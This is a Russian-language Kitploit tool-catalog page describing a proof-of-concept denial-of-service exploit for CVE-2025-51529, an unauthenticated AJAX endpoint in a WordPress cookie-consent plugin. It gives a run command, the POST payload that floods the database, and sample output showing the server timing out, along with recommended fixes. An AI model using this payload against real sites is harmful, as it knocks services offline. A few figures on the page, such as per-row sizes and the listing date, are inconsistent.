Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-51529 — Некорректный контроль доступа в функциональности AJAX-конечной точки в плагине jonkastonka Cookies and Content Security Policy вплоть до версии 2.29 | Kitploit
Инструменты/GitHubGitHub/piotrmaciejbednarski/cve-2025-51529
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubpiotrmaciejbednarski/cve-2025-51529

CVE-2025-51529

Некорректный контроль доступа в функциональности AJAX-конечной точки в плагине jonkastonka Cookies and Content Security Policy вплоть до версии 2.29

Репозиторий
Сайт
61 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-51529: Уязвимость DoS в плагине WordPress Cookies and Content Security Policy

Некорректный контроль доступа в функциональности AJAX-эндпоинта в плагине jonkastonka Cookies and Content Security Policy версии до 2.29 позволяет удалённым злоумышленникам вызвать отказ в обслуживании (истощение ресурсов сервера базы данных) с помощью неограниченных операций записи в базу данных на эндпоинт wp_ajax_nopriv_cacsp_insert_consent_data.

Уязвимость существует в функции cacsp_insert_consent_data(), которая открывается через AJAX-эндпоинт WordPress (wp-admin/admin-ajax.php) без требований аутентификации. Плагин использует действие wp_ajax_nopriv_, делая его доступным для неаутентифицированных пользователей.

Вектор атаки: Удалённые злоумышленники могут отправлять неограниченное количество одновременных POST-запросов, чтобы перегрузить сервер базы данных операциями записи, вызывая истощение CPU и дискового ввода-вывода.

Детали уязвимости

  • Идентификатор CVE: CVE-2025-51529
  • Статус: RESERVED
  • Тип: Некорректный контроль доступа / Отказ в обслуживании
  • Продукт: Плагин Cookies and Content Security Policy версии до 2.29
  • Вендор: Johan Jonk Stenstroem (jonkastonka)
  • Затронутая функция: cacsp_insert_consent_data()
  • Вектор атаки: Удалённый
  • Обнаружил: Piotr Bednarski
  • Требования

    • Python 3.x
    • requests
    • matplotlib
    • threading

    Использование

    Базовое использование PoC-скрипта выглядит следующим образом:

    root@kitploit:~
    python payload.py --target <target_url> --threads <number_of_threads>
    

    По умолчанию количество потоков установлено на 100. Вы можете указать другое количество потоков, передав его вторым аргументом.

    Пример вывода

    Диаграмма DoS-атаки

    root@kitploit:~
    Target WordPress URL (https://example.com): https://vulnerable-site.com
    Number of threads (default 100): 
    
    Launching DoS attack with 100 threads...
    Press Ctrl+C to stop the attack
    
    [19:41:20] ✓ Status: 200 | Response time: 538.3ms | DB: 0.00MB (1 rows, 351b/row)
    [19:41:20] ✓ Status: 200 | Response time: 554.51ms | DB: 0.00MB (2 rows, 351b/row)
    [19:41:20] ✓ Status: 200 | Response time: 522.29ms | DB: 0.00MB (3 rows, 351b/row)
    [19:41:20] ✓ Status: 200 | Response time: 498.72ms | DB: 0.00MB (4 rows, 351b/row)
    [19:41:21] ✓ Status: 200 | Response time: 946.94ms | DB: 0.00MB (5 rows, 351b/row)
    [19:41:21] ✓ Status: 200 | Response time: 858.41ms | DB: 0.00MB (6 rows, 351b/row)
    [19:41:21] ✓ Status: 200 | Response time: 922.29ms | DB: 0.00MB (7 rows, 351b/row)
    [19:41:21] ✓ Status: 200 | Response time: 991.41ms | DB: 0.00MB (8 rows, 351b/row)
    ...
    [19:41:26] ⚠ TIMEOUT - server not responding
    [19:41:26] ⚠ TIMEOUT - server not responding
    [19:41:26] ⚠ TIMEOUT - server not responding
    [19:41:26] ⚠ TIMEOUT - server not responding
    [19:41:26] ⚠ TIMEOUT - server not responding
    

    Как это работает

    Эксплойт отправляет POST-запросы на /wp-admin/admin-ajax.php с:

    root@kitploit:~
    data = {
        'action': 'cacsp_insert_consent_data',
        'accepted_cookies': 'necessary,experience,analytics,marketing',
        'expires': "9" * 255  # Maximum TINYTEXT length
    }
    

    Каждый успешный запрос вставляет новую строку в базу данных, содержащую:

    • Метка времени (19 байт)
    • IP-адрес (~13 байт)
    • Настройки cookie (переменные)
    • Данные об истечении (до 255 байт)
    • ID сайта (1 байт)
    • Накладные расходы MySQL (~22 байта)

    Результат: ~89 байт на запрос × неограниченное количество запросов = быстрый рост базы данных

    Рекомендуемые исправления

    • Добавить проверку nonce для AJAX-вызовов
    • Реализовать ограничение частоты запросов по IP
    • Правильно проверять пользовательские входные данные

    Отказ от ответственности

    Данный PoC предназначен только для образовательных целей. Автор не несёт ответственности за любое неправильное использование или ущерб, причинённый в результате использования этого кода. Всегда получайте разрешение перед тестированием любой системы.

    Скачать инструмент